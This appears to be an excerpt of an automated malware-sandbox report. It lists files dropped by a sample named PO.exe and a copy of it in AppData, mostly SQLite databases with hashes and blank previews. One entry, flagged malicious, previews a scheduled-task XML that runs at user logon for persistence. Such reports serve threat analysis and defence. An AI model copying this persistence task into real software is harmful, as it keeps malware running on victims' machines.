                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1583
                      Entropy (8bit):5.11800490128808
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtkxvn:cgergYrFdOFzOzN33ODOiDdKrsuT0v
                      MD5:1CA22DCFBADB6107577BDA22B32BD86C
                      SHA1:69BE9304F80294A061CB43DDDD505BB4C09ABBA9
                      SHA-256:F3B7B692FA1DA9406F506EA7728E20E9094D6CE13F829D361F78189BCEDAA573
                      SHA-512:36D5DB6D5A980A1C60D98A12C9407FB7B28B95FCB285D10D9DA3222C72C5BF4523E864FD394371320A13185D1F1A96A0A1F33B9610169E233F05A9ECD595CC58
                      Malicious:true
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
